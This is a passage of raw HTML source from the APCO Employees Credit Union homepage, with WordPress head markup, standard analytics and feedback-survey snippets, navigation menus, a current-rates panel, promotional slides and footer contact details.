href='https://fonts.googleapis.com/css?family=PT+Sans+Narrow:400,700' rel='stylesheet' type='text/css'> <!-- RSS & Pingback --> <link rel="alternate" type="application/rss+xml" title="APCO Employees Credit Union RSS Feed" href="https://www.apcocu.org/feed/" /> <link rel="alternate" type="application/atom+xml" title="APCO Employees Credit Union Atom Feed" href="https://www.apcocu.org/feed/atom/" /> <link rel="pingback" href="https://www.apcocu.org/xmlrpc.php" /> <link rel="shortcut icon" href="https://www.apcocu.org/wp-content/uploads/favicon.png" /> <link rel="apple-touch-icon" href="/wp-content/uploads/touch-icon-iphone.png" /> <link rel="apple-touch-icon" sizes="72x72" href="/wp-content/uploads/touch-icon-ipad.png" /> <link rel="apple-touch-icon" sizes="114x114" href="/wp-content/uploads/touch-icon-iphone-retina.png" /> <link rel="apple-touch-icon" sizes="144x144" href="/wp-content/uploads/touch-icon-ipad-retina.png" /> <!-- Comment reply script --> <meta http-equiv="X-UA-Compatible" content="IE=edge,chrome=1" /> <link rel='dns-prefetch' href='//www.google.com' /> <link rel='dns-prefetch' href='//s.w.org' /> <link rel="alternate" type="application/rss+xml" title="APCO Employees Credit Union &raquo; Feed" href="https://www.apcocu.org/feed/" /> <link rel="alternate" type="application/rss+xml" title="APCO Employees Credit Union &raquo; Comments Feed" href="https://www.apcocu.org/comments/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11.2.0\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/www.apcocu.org\/wp-includes\/js\/wp-emoji-release.min.js?ver=5.1.1"}}; !function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://www.apcocu.org/wp-includes/css/dist/block-library/style.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='contact-form-7-css' href='https://www.apcocu.org/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='prefix-style-css' href='https://www.apcocu.org/wp-content/plugins/fiat-alert-bar/fiat-alert-style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='dashicons-css' href='https://www.apcocu.org/wp-includes/css/dashicons.min.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='cmi-offsite-linkifier-frontend-style-css' href='https://www.apcocu.org/wp-content/plugins/offsite-linkifier/css/style.css?ver=5.1.1' type='text/css' media='all' /> <link rel='stylesheet' id='responsive-video-light-css' href='https://www.apcocu.org/wp-content/plugins/responsive-video-light/css/responsive-videos.css?ver=20130111' type='text/css' media='all' /> <link rel='stylesheet' id='tablepress-default-css' href='https://www.apcocu.org/wp-content/tablepress-combined.min.css?ver=12' type='text/css' media='all' /> <script type='text/javascript' src='https://www.apcocu.org/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script> <script type='text/javascript'> /* <![CDATA[ */ var cmioffsitelinkifier = {"lightbox":"yes","alwaysaddto":["div.google-map-placeholder"]}; /* ]]> */ </script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/plugins/offsite-linkifier/js/links.js?ver=5.1.1'></script> <script type='text/javascript' src='https://www.apcocu.org/wp-content/plugins/google-analyticator/external-tracking.min.js?ver=6.5.4'></script> <link rel='https://api.w.org/' href='https://www.apcocu.org/wp-json/' /> <link rel="canonical" href="https://www.apcocu.org/" /> <link rel='shortlink' href='https://www.apcocu.org/' /> <link rel="alternate" type="application/json+oembed" href="https://www.apcocu.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.apcocu.org%2F" /> <link rel="alternate" type="text/xml+oembed" href="https://www.apcocu.org/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fwww.apcocu.org%2F&#038;format=xml" /> <script type='text/javascript'> /* <![CDATA[ */ // Comprehensive Google Map plugin v9.1.2 var CGMPGlobal = {"ajaxurl":"https:\/\/www.apcocu.org\/wp-admin\/admin-ajax.php","noBubbleDescriptionProvided":"No description provided","geoValidationClientRevalidate":"REVALIDATE","cssHref":"https:\/\/www.apcocu.org\/wp-content\/plugins\/comprehensive-google-map-plugin\/style.css?ver=9.1.2","language":"en","customMarkersUri":"https:\/\/www.apcocu.org\/wp-content\/plugins\/comprehensive-google-map-plugin\/assets\/css\/images\/markers\/","kml":"[TITLE] [MSG] ([STATUS])","kmlDocInvalid":"The KML file is not a valid KML, KMZ or GeoRSS document.","kmlFetchError":"The KML file could not be fetched.","kmlLimits":"The KML file exceeds the feature limits of KmlLayer.","kmlNotFound":"The KML file could not be found. Most likely it is an invalid URL, or the document is not publicly available.","kmlRequestInvalid":"The KmlLayer is invalid.","kmlTimedOut":"The KML file could not be loaded within a reasonable amount of time.","kmlTooLarge":"The KML file exceeds the file size limits of KmlLayer.","kmlUnknown":"The KML file failed to load for an unknown reason.","address":"Address","streetView":"Street View","directions":"Directions","toHere":"To here","fromHere":"From here","mapFillViewport":"false","timestamp":"91435baf64","ajaxCacheMapAction":"cgmp_ajax_cache_map_action","sep":"{}"} /* ]]> */ </script> <meta name="apple-itunes-app" content="app-id=1060798927"><script type="text/javascript"> setTimeout(function(){var a=document.createElement("script"); var b=document.getElementsByTagName('script')[0]; a.src=document.location.protocol+"//script.crazyegg.com/pages/scripts/0017/1609.js"; a.async=true;a.type="text/javascript";b.parentNode.insertBefore(a,b)}, 1); </script> <!-- Google Analytics Tracking by Google Analyticator 6.5.4: http://www.videousermanuals.com/google-analyticator/ --> <script type="text/javascript"> var analyticsFileTypes = ['']; var analyticsSnippet = 'enabled'; var analyticsEventTracking = 'enabled'; </script> <script type="text/javascript"> var _gaq = _gaq || []; _gaq.push(['_setAccount', 'UA-39596896-1']); _gaq.push(['_addDevId', 'i9k95']); // Google Analyticator App ID with Google _gaq.push(['_trackPageview']); (function() { var ga = document.createElement('script'); ga.type = 'text/javascript'; ga.async = true; ga.src = ('https:' == document.location.protocol ? 'https://ssl' : 'http://www') + '.google-analytics.com/ga.js'; var s = document.getElementsByTagName('script')[0]; s.parentNode.insertBefore(ga, s); })(); </script> <!-- END head --> </head> <!--BEGIN Body --> <body class="home page-template page-template-template_home_w_slider page-template-template_home_w_slider-php page page-id-9 layout-2cr"> <!--BEGIN QUALTRICS WEBSITE FEEDBACK SNIPPET--><script type='text/javascript'>(function(){var g=function(e,h,f,g){this.get=function(a){for(var a=a+"=",c=document.cookie.split(";"),b=0,e=c.length;b<e;b++){for(var d=c[b];" "==d.charAt(0);)d=d.substring(1,d.length);if(0==d.indexOf(a))return d.substring(a.length,d.length)}return null};this.set=function(a,c){var b="",b=new Date;b.setTime(b.getTime()+6048E5);b="; expires="+b.toGMTString();document.cookie=a+"="+c+b+"; path=/; "};this.check=function(){var a=this.get(f);if(a)a=a.split(":");else if(100!=e)"v"==h&&(e=Math.random()>=e/100?0:100),a=[h,e,0],this.set(f,a.join(":"));else return!0;var c=a[1];if(100==c)return!0;switch(a[0]){case "v":return!1;case "r":return c=a[2]%Math.floor(100/c),a[2]++,this.set(f,a.join(":")),!c}return!0};this.go=function(){if(this.check()){var a=document.createElement("script");a.type="text/javascript";a.src=g+ "&t=" + (new Date()).getTime();document.body&&document.body.appendChild(a)}};this.start=function(){var a=this;window.addEventListener?window.addEventListener("load",function(){a.go()},!1):window.attachEvent&&window.attachEvent("onload",function(){a.go()})}};try{(new g(100,"r","QSI_S_ZN_exk5V0s3N7ayp3D","https://znexk5v0s3n7ayp3d-apcocu.siteintercept.qualtrics.com/WRSiteInterceptEngine/?Q_ZID=ZN_exk5V0s3N7ayp3D&Q_LOC="+encodeURIComponent(window.location.href))).start()}catch(i){}})();</script><div id='ZN_exk5V0s3N7ayp3D'><!--DO NOT REMOVE-CONTENTS PLACED HERE--></div><!--END WEBSITE FEEDBACK SNIPPET--> <script type="text/javascript"> var _monsido = _monsido || []; _monsido.push(['_setDomainToken', 'vigHRpoosXLl3xLIpYsmwg']); _monsido.push(['_withStatistics', 'true']); </script> <script src="//cdn.monsido.com/tool/javascripts/monsido.js"></script> <div class="header_bg"> <!--BEGIN header --> <header class="top"> <!--BEGIN #header_left --> <!--BEGIN #logo --> <div id="logo"> <a href="https://www.apcocu.org/" title="APCO Employees Credit Union"> <img src="https://www.apcocu.org/wp-content/uploads/apco-logo-420x150-feb-2018.png" alt="APCO Employees Credit Union" /> </a> </div> <!--END #logo--> <!--END #header_left --> <!--BEGIN #header_right --> <div class="top_right"> <nav> <div id="top-menu" class="menu-top-menu-container"><ul id="menu-top-menu" class="right-side"><li id="menu-item-1904" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1904"><a href="https://www.apcocu.org/visa/">Visa</a></li> <li id="menu-item-1905" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1905"><a href="http://www.apco4sale.com/">For Sale</a></li> <li id="menu-item-1906" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1906"><a href="https://www.apcocu.org/calculators/">Calculators</a></li> <li id="menu-item-1907" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1907"><a href="https://www.apcocu.org/faq/">FAQ</a></li> <li id="menu-item-1908" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1908"><a href="https://www.apcocu.org/about-us/contact-us/">Contact Us</a></li> </ul></div> </nav> <div style="clear:both"></div> <div class="onlinebanking_block"> <div class="content"> <div class="title">Online Banking</div> <div class="instructions"><a href="https://apcocu.online-cu.com/">Log In to your Account</a><br /> Not enrolled? <a href="https://apcocu.online-cu.com/ISuite5/Features/Auth/SelfEnrollment/SelfEnrollmentDisclosure.aspx">Sign up today!</a></div> </div> <div class="icon"> <img src="/wp-content/uploads/icon_online_banking.png" width="50" height="50" border='1' alt="Blue circle with white computer icon"> </div> </div> <div class="socialmedia"> <div class="icon"><a href="/apco-investment-services/" title="APCO Investment Services"><img src="/wp-content/uploads/ais-200x100v1.png" border="0" width="200" height="100" align="top" alt="APCO Investment Services Logo"><br /></a> </div> </div> <!--END #header_right --> </div> <!--CLEAR--> <div class="clear"></div> <!--END #header --> </header> </div> <div class="container"> <nav> <div id="main-menu" class="menu-main-menu-container"><ul id="menu-main-menu" class="sf-menu"><li id="menu-item-1824" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-home current-menu-item page_item page-item-9 current_page_item menu-item-1824"><a href="https://www.apcocu.org/" aria-current="page">Home</a></li> <li id="menu-item-1825" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1825"><a href="https://www.apcocu.org/about-us/">About Us</a> <ul class="sub-menu"> <li id="menu-item-1833" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1833"><a href="https://www.apcocu.org/wp-content/uploads/APCO-ECU-2018-Annual-Report.pdf">Annual Report</a></li> <li id="menu-item-1827" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1827"><a href="https://www.apcocu.org/about-us/companies-and-groups-served-by-apco-employees-credit-union/">Companies and Groups Served</a></li> <li id="menu-item-1829" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1829"><a href="https://www.apcocu.org/forms-applications-2/">Forms &#038; Applications</a></li> <li id="menu-item-1828" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1828"><a href="https://www.apcocu.org/about-us/who-is-eligible-for-membership/">Membership</a></li> <li id="menu-item-1830" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1830"><a href="https://www.apcocu.org/about-us/apco-employees-credit-union-privacy-disclosure/">Privacy Disclosure</a></li> <li id="menu-item-1826" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1826"><a href="https://www.apcocu.org/about-us/safety-and-soundness/">Safety and Soundness</a></li> <li id="menu-item-1831" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1831"><a href="https://www.apcocu.org/about-us/service-charges-and-maintenance-fees/">Service Charges and Maintenance Fees</a></li> </ul> </li> <li id="menu-item-1834" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1834"><a href="https://www.apcocu.org/accounts/">Accounts</a> <ul class="sub-menu"> <li id="menu-item-1835" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1835"><a href="https://www.apcocu.org/accounts/certificates-of-deposit/">Certificates of Deposit</a></li> <li id="menu-item-1836" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1836"><a href="https://www.apcocu.org/accounts/checking-accounts/">Checking Accounts</a></li> <li id="menu-item-1837" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1837"><a href="https://www.apcocu.org/accounts/christmas-club-accounts/">Christmas Club Accounts</a></li> <li id="menu-item-1838" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1838"><a href="https://www.apcocu.org/accounts/individual-retirement-accounts/">Individual Retirement Accounts</a></li> <li id="menu-item-1840" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1840"><a href="https://www.apcocu.org/accounts/share-accounts/">Share Accounts</a></li> </ul> </li> <li id="menu-item-1841" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1841"><a href="https://www.apcocu.org/loans/">Loans</a> <ul class="sub-menu"> <li id="menu-item-175713" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-175713"><a href="https://www.apcocu.org/loan-application-preview/">Auto Loans</a></li> <li id="menu-item-1844" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1844"><a href="https://www.apcocu.org/loans/real-estate-loans/">Mortgage Loans</a></li> <li id="menu-item-175714" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-175714"><a href="https://www.apcocu.org/loan-application-preview/">Personal Loans</a></li> <li id="menu-item-1845" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1845"><a href="https://www.apcocu.org/loans/visa-credit-cards/">Visa Credit Cards</a></li> </ul> </li> <li id="menu-item-1846" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1846"><a href="https://www.apcocu.org/rates/">Rates</a> <ul class="sub-menu"> <li id="menu-item-1848" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1848"><a href="https://www.apcocu.org/rates/auto-rates/">Auto Rates</a></li> <li id="menu-item-2535" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2535"><a href="https://www.apcocu.org/rates/mortgage-rates/">Mortgage Rates</a></li> <li id="menu-item-1850" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1850"><a href="https://www.apcocu.org/rates/other-rates/">Other Rates</a></li> <li id="menu-item-1849" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1849"><a href="https://www.apcocu.org/rates/personal-rates/">Personal Rates</a></li> <li id="menu-item-1847" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1847"><a href="https://www.apcocu.org/rates/savings-rates/">Savings Rates</a></li> </ul> </li> <li id="menu-item-2444" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-2444"><a href="https://www.apcocu.org/online-banking/">Online Services</a> <ul class="sub-menu"> <li id="menu-item-1857" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1857"><a href="https://www.apcocu.org/check-orders/">Check Orders</a></li> <li id="menu-item-55163" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55163"><a href="https://www.apcocu.org/mobile-banking/">Mobile Banking</a></li> <li id="menu-item-2430" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2430"><a href="https://www.apcocu.org/online-banking/">Online Banking</a></li> <li id="menu-item-55160" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55160"><a href="https://www.apcocu.org/bill-pay/">Bill Pay</a></li> <li id="menu-item-1858" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1858"><a href="https://www.quicken.com" data-linkify="true">Quicken</a></li> </ul> </li> <li id="menu-item-1860" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1860"><a href="https://www.apcocu.org/locations/">Locations</a> <ul class="sub-menu"> <li id="menu-item-1861" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1861"><a href="https://www.apcocu.org/locations/atms/">ATM Locations</a></li> <li id="menu-item-1862" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1862"><a href="https://www.apcocu.org/locations/">Branches</a></li> <li id="menu-item-1863" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1863"><a href="https://www.co-opfs.org/Shared-Branches-ATMs" data-linkify="true">CU Service Centers</a></li> </ul> </li> <li id="menu-item-2282" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-2282"><a href="https://www.apcocu.org/apco-investment-services/">Other Services</a> <ul class="sub-menu"> <li id="menu-item-2254" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2254"><a href="https://www.apcocu.org/apco-investment-services/">APCO Investment Services</a></li> <li id="menu-item-1868" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1868"><a href="https://www.apcocu.org/calculators/">Calculators</a></li> <li id="menu-item-1866" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1866"><a href="https://www.apcocu.org/automated-teller-system/">Automated Teller System</a></li> <li id="menu-item-1874" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1874"><a href="https://www.apcocu.org/employment-opportunities/">Employment Opportunities</a></li> <li id="menu-item-2348" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2348"><a href="http://apco4sale.com/">Homes For Sale</a></li> <li id="menu-item-2179" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2179"><a href="https://www.apcocu.org/insurance-services/">Insurance Services</a></li> <li id="menu-item-55354" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-55354"><a href="https://www.membersecuritycenter.com/" data-linkify="true">Member Security Center</a></li> </ul> </li> </ul></div> </nav> <!--END #menu-main-menu --> </div> <div class="slider_bg slider_bg_cam_style"> <div class="container"> <div class="entry_custom"> <div class="inset"> <h3><strong>Today's Rates</strong></h3> <div class="todaysrates"> <div class="rate_row even"><div class="name">30 Year Fixed</div><div class="value"><a href="https://apcocu.mortgagewebcenter.com">Get Rate</a></div><div style="clear:both;"></div></div> <div class="rate_row odd"><div class="name">15 Year Fixed</div><div class="value"><a href="https://apcocu.mortgagewebcenter.com">Get Rate</a></div><div style="clear:both;"></div></div> <div class="rate_row even"><div class="name"><a href="/auto-loans/">New Auto (60 mo)</a></div><div class="value">2.90% APR</div><div style="clear:both;"></div></div> <div class="rate_row odd"><div class="name"><a href="/auto-loans/">Used Auto (60 mo)</a></div><div class="value">3.45% APR</div><div style="clear:both;"></div></div> <div class="rate_row even"><div class="name"><a href="/visa-credit-cards/">VISA® Credit Card</a></div><div class="value">10.9% APR</div><div style="clear:both;"></div></div> <div class="rate_row odd"><div class="name"><a href="/savings-rates/">CD - 60 mo.</a></div><div class="value">3.35% APY</div><div style="clear:both;"></div></div> <div class="rate_row even"><div class="name"><small>APR - Annual<br>Percentage Rate</small></div><div class="value"><small>APY - Annual Percentage Yield</small></div><div style="clear:both;"></div></div> </div> <div class="todaysrates_more"> <div class="morelink"><a href="/rates/"><span></span>More Rates...</a></div> </div> </div> </div> <aside id="slider-wrapper-slider-cam" class="slider_style_cam_second"> <div class="fluid_container"> <div class="camera_wrap camera_emboss" id="camera_wrap_3" style="display: block; margin-bottom: 51px; height:323px;"> <div class="slideshow_container slideshow_container_style-light" style="height: 323px; max-width: 672px;" data-slideshow-id="1637" data-style-name="style-light" data-style-version="2.3.1" > <div class="slideshow_loading_icon"></div> <div class="slideshow_content" style="display: none;"> <div class="slideshow_view"> <div class="slideshow_slide slideshow_slide_image"> <a href="https://www.apcocu.org/accounts/" target="_self" > <img src="https://www.apcocu.org/wp-content/uploads/APCO-CU-Website-Rotators-January-2019-672x323.jpg" alt="Piggy bank. Savings, Checking, Bill Pay APCOECU logo. On the Chinese calendar, 2019 is the Year of the Pig." width="672" height="323" /> </a> <div class="slideshow_description_box slideshow_transparent"> <div class="slideshow_title"><a href="https://www.apcocu.org/accounts/" target="_self" >APCO CU Website Rotators January 2019 672x323</a></div> </div> </div> <div style="clear: both;"></div></div><div class="slideshow_view"> <div class="slideshow_slide slideshow_slide_image"> <a href="https://www.apcocu.org/mobile-banking/" target="_self" > <img src="https://www.apcocu.org/wp-content/uploads/APCO-CU-Website-Rotators-January-2019-672x3232.jpg" alt="Teenager with cell phone pointing to APCOECU mobile app on screen. Online banking. Mobile Banking. APCOECU logo." width="672" height="323" /> </a> <div class="slideshow_description_box slideshow_transparent"> <div class="slideshow_title"><a href="https://www.apcocu.org/mobile-banking/" target="_self" >APCO CU Website Rotators January 2019 672x3232</a></div> </div> </div> <div style="clear: both;"></div></div><div class="slideshow_view"> <div class="slideshow_slide slideshow_slide_image"> <a href="https://www.apcocu.org/visa/" target="_self" > <img src="https://www.apcocu.org/wp-content/uploads/APCO-CU-Website-Rotators-January-2019-672x3233.jpg" alt="Couple making online purchase holding credit card. Visa Power Credit Card. No annual fee. 1% cash back. APCOECU logo." width="672" height="323" /> </a> <div class="slideshow_description_box slideshow_transparent"> <div class="slideshow_title"><a href="https://www.apcocu.org/visa/" target="_self" >APCO CU Website Rotators January 2019 672x3233</a></div> </div> </div> <div style="clear: both;"></div></div><div class="slideshow_view"> <div class="slideshow_slide slideshow_slide_image"> <a href="https://www.apcocu.org/loans/" target="_self" > <img src="https://www.apcocu.org/wp-content/uploads/APCO-CU-Website-Rotators-January-2019-672x3234.jpg" alt="Woman hugging new car. Auto loans, mortgage loans, personal loans. NCUA logo, EHO logo. Federally insured by NCUA. Equal housing opportunity lender." width="672" height="323" /> </a> <div class="slideshow_description_box slideshow_transparent"> <div class="slideshow_title"><a href="https://www.apcocu.org/loans/" target="_self" >APCO CU Website Rotators January 2019 672x3234</a></div> </div> </div> <div style="clear: both;"></div></div><div class="slideshow_view"> <div class="slideshow_slide slideshow_slide_image"> <a href="https://www.apcocu.org/apco-investment-services/" target="_self" > <img src="https://www.apcocu.org/wp-content/uploads/APCO-CU-Website-Rotators-January-2019-672x3235.jpg" alt="Middle aged couple. Retirement Services. Financial Services. APCO Investment Services logo." width="672" height="323" /> </a> <div class="slideshow_description_box slideshow_transparent"> <div class="slideshow_title"><a href="https://www.apcocu.org/apco-investment-services/" target="_self" >APCO CU Website Rotators January 2019 672x3235</a></div> </div> </div> <div style="clear: both;"></div></div><div class="slideshow_view"> <div class="slideshow_slide slideshow_slide_image"> <a href="https://www.apcocu.org/about-us/who-is-eligible-for-membership/" target="_self" > <img src="https://www.apcocu.org/wp-content/uploads/APCO-CU-Website-Rotators-January-2019-672x3236.jpg" alt="Selfie group photo. APCOECU logo. Serving Alabama Power employees and over 100 other conpanies and organizations." width="672" height="323" /> </a> <div class="slideshow_description_box slideshow_transparent"> <div class="slideshow_title"><a href="https://www.apcocu.org/about-us/who-is-eligible-for-membership/" target="_self" >APCO CU Website Rotators January 2019 672x3236</a></div> </div> </div> <div style="clear: both;"></div></div> </div> <div class="slideshow_controlPanel slideshow_transparent" style="display: none;"><ul><li class="slideshow_togglePlay" data-play-text="Play" data-pause-text="Pause"></li></ul></div> <div class="slideshow_button slideshow_previous slideshow_transparent" role="button" data-previous-text="Previous" style="display: none;"></div> <div class="slideshow_button slideshow_next slideshow_transparent" role="button" data-next-text="Next" style="display: none;"></div> <div class="slideshow_pagination" style="display: none;" data-go-to-text="Go to slide"><div class="slideshow_pagination_center"></div></div> <!-- WordPress Slideshow Version 2.3.1 --> </div> </div> </div> </aside> </div> <div class="clear"></div> </div> <div class="container"> <!--BEGIN section#contentABC--> <section class="content"> <!--BEGIN .post_detail--> <div class="post_detail"> <!--BEGIN .entry--> <div class="entry"> <div class="row_sh"> <div class="four columns_sh"> <div id="text-8" class="widget_text"><h3><strong>Featured Topic</strong></h3> <div class="textwidget"><p>Earning interest on basic checking is almost unheard of. Not only does your Credit Union checking account pay you interest, we’re increasing the amount. Effective January 1, 2019, checking accounts with an average daily balance of $2,000 or more will earn interest at .75% APY while all others will earn interest at .35% APY.</p> </div> </div> </div> <div class="four columns_sh"> <h3><strong>Good to Know</strong></h3><div class='widget_text'><div class='textwidget'><p>Be sure to let your Credit Union know when you plan to be out of town. We want to make sure access to your money remains convenient and safe.</p><p><a href='/whats-happening/' class='arrow'><span></span>More Good Things to Know...</a></p></div></div> </div> <div class="four columns_sh"> <div id="nav_menu-2" class="widget_nav_menu"><h3><strong>Quicklinks</strong></h3><div class="menu-quick-links-container"><ul id="menu-quick-links" class="menu"><li id="menu-item-1891" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1891"><a href="https://www.ordermychecks.com" data-linkify="true">Check Orders</a></li> <li id="menu-item-1894" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1894"><a href="https://www.co-opfs.org/Shared-Branches-ATMs" data-linkify="true">CU Service Centers</a></li> <li id="menu-item-1897" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1897"><a href="https://www.apcocu.org/forms-applications-2/">Forms &#038; Applications</a></li> <li id="menu-item-55137" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-55137"><a href="https://www.apcocu.org/mobile-banking/">Mobile Banking</a></li> <li id="menu-item-1893" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1893"><a href="https://apcocu.mortgagewebcenter.com/">Mortgage Center</a></li> <li id="menu-item-1898" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1898"><a href="https://www.apcocu.org/newsletters/">Newsletters</a></li> <li id="menu-item-1895" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1895"><a href="https://www.ezcardinfo.com/">Visa Card Info</a></li> </ul></div></div> </div> </div> <!-- <div class="eight columns_sh no_top_margin"> <div class="seven columns_sh"> <div id="text-8" class="widget_text"><h3><strong>Featured Topic</strong></h3> <div class="textwidget"><p>Earning interest on basic checking is almost unheard of. Not only does your Credit Union checking account pay you interest, we’re increasing the amount. Effective January 1, 2019, checking accounts with an average daily balance of $2,000 or more will earn interest at .75% APY while all others will earn interest at .35% APY.</p> </div> </div> </div> <div class="five columns_sh"> <h3><strong>Today's Rates</strong></h3> <h3><strong>Good to Know</strong></h3><div class='widget_text'><div class='textwidget'><p>Be sure to let your Credit Union know when you plan to be out of town. We want to make sure access to your money remains convenient and safe.</p><p><a href='/whats-happening/' class='arrow'><span></span>More Good Things to Know...</a></p></div></div> </div> </div> --> <!--END .entry--> </div> <!--END .post_detail--> </div> <!--END section#content--> </section> <!--END container--> </div> <!--BEGIN #footer--> <div class="footer_top_bg_fluid"> <div class="container"> <div class="footer_top">&#8220;Making the Financial Difference for MEMBERS.&#8221;</div> </div> </div> <div class="footer_bg_fluid"> <div class="container"> <footer class="f"> <!-- FOOTER BEGIN --> <aside class="container f_top"> <div class="four columns"><div id="text-3" class="widget_box widget_text"> <div class="textwidget"><h4 class="title">APCO Employees Credit Union</h4> <p>750 17th St. North<br /> Birmingham, AL 35203<br /> Main Office: 205-226-6800<br /> Toll Free: 1-800-249-APCO</p> <p> <a href="http://www.apconews.com/" title="APCO News"><img src="/wp-content/uploads/icon_social_apconews.png" alt="APCO News" width="24" height="24"></a> <a href="https://www.youtube.com/user/apcocu/" title="YouTube" data-linkify="true"><img src="/wp-content/uploads/icon_social_youtube.png" alt="YouTube" width="24" height="24"></a> <a href="https://twitter.com/apcocu" title="Twitter" data-linkify="true"><img src="/wp-content/uploads/icon_social_twitter.png" alt="Twitter" width="24" height="24"></a> <a href="https://www.facebook.com/APCOCreditUnion" title="Facebook" data-linkify="true"><img src="/wp-content/uploads/icon_social_facebook.png" alt="Facebook" width="24" height="24"></a></p> <p>Federally insured by NCUA</p> <div><img src="/wp-content/uploads/NCUA_EOL_Logos.png" title="NCUA Equal Opportunity Lender" 